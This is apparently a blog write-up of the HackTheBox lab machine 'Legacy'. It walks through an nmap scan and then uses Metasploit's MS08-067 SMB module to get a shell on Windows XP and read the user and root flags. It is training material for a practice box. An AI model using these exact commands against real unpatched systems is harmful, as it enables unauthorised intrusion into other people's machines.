On my quest through the retired boxes of HackTheBox, the next adversary is "Legacy". If there were a moral to this box, it would be "Patch your shit!".
nmap -p- -A 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up (0.062s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows 2000 SP4 (91%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Host script results:
|_clock-skew: mean: 5d00h28m49s, deviation: 2h07m16s, median: 4d22h58m49s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: , NetBIOS MAC: 00:50:56:b9:c5:57 (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2020-04-12T19:16:27+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
As we can see, there is a closed remote desktop port (3389), but the default SMB ports (139 & 445) are open. So let's try to get some information via that:
Hmm, looks like that won't work. We time out. This is one of the times were using the -A option for the nmap helps us. Through that, nmap delivers us an educated guess on which operating system is running on the target. With 94% certainty, nmap assumes the target to be running Windows XP, Service Pack 3. That's a very old system, a legacy system, as we say. There haven't been patches for ages for that Operating System, so every exploit discovered since then is still usable. Let's take a look at what metasploit has to offer. As the only open ports are for SMB, let's limit the search to SMB exploits:
msfconsole
msf5 > search exploit/windows/smb
It's a long list. Some of the exploits don't allow remote execution, others don't affect Windows XP. It's just a matter of looking up some details of the exploits, so I won't list them here. Instead, let's skip to the point where we decide on an exploit to use. In this case, it's MS08_67. Let's use it in metasploit:
msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) > run
meterpreter > shell
Process 1852 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
And we got a shell. Let's grab that flag:
C:\WINDOWS\system32>cd C:\
cd C:\
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\
16/03/2017 08:30 �� 0 AUTOEXEC.BAT
16/03/2017 08:30 �� 0 CONFIG.SYS
16/03/2017 09:07 �� Documents and Settings
29/12/2017 11:41 �� Program Files
12/04/2020 07:03 �� WINDOWS
2 File(s) 0 bytes
3 Dir(s) 6.297.686.016 bytes free
C:\>cd "Documents and Settings"
cd "Documents and Settings"
C:\Documents and Settings>dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings
16/03/2017 09:07 �� .
16/03/2017 09:07 �� ..
16/03/2017 09:07 �� Administrator
16/03/2017 08:29 �� All Users
16/03/2017 08:33 �� john
0 File(s) 0 bytes
5 Dir(s) 6.297.681.920 bytes free
C:\Documents and Settings>cd john
C:\Documents and Settings\john>dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\john
16/03/2017 08:33 �� .
16/03/2017 08:33 �� ..
16/03/2017 09:19 �� Desktop
16/03/2017 08:33 �� Favorites
16/03/2017 08:33 �� My Documents
16/03/2017 08:20 �� Start Menu
0 File(s) 0 bytes
6 Dir(s) 6.297.681.920 bytes free
C:\Documents and Settings\john>cd Desktop
C:\Documents and Settings\john\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\john\Desktop
16/03/2017 09:19 �� 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 6.297.681.920 bytes free
C:\Documents and Settings\john\Desktop>type user.txt
We got it! Now let's move on to the root flag.
C:\Documents and Settings\john\Desktop>cd ../../Administrator
C:\Documents and Settings\Administrator>
Seems like we already have the permissions to access the Administrator's home directory. If we're lucky, we already have the privileges to grab the root flag.
C:\Documents and Settings\Administrator>cd Desktop
C:\Documents and Settings\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 54BF-723B
Directory of C:\Documents and Settings\Administrator\Desktop
16/03/2017 09:18 �� .
16/03/2017 09:18 �� ..
16/03/2017 09:18 �� 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 6.297.653.248 bytes free
C:\Documents and Settings\Administrator\Desktop>type root.txt
And it worked! Another nice box about the basics. As said in the beginning, the vulnerability here is a lack of patching. Nothing complex, but one of the more common scenarios in the real world.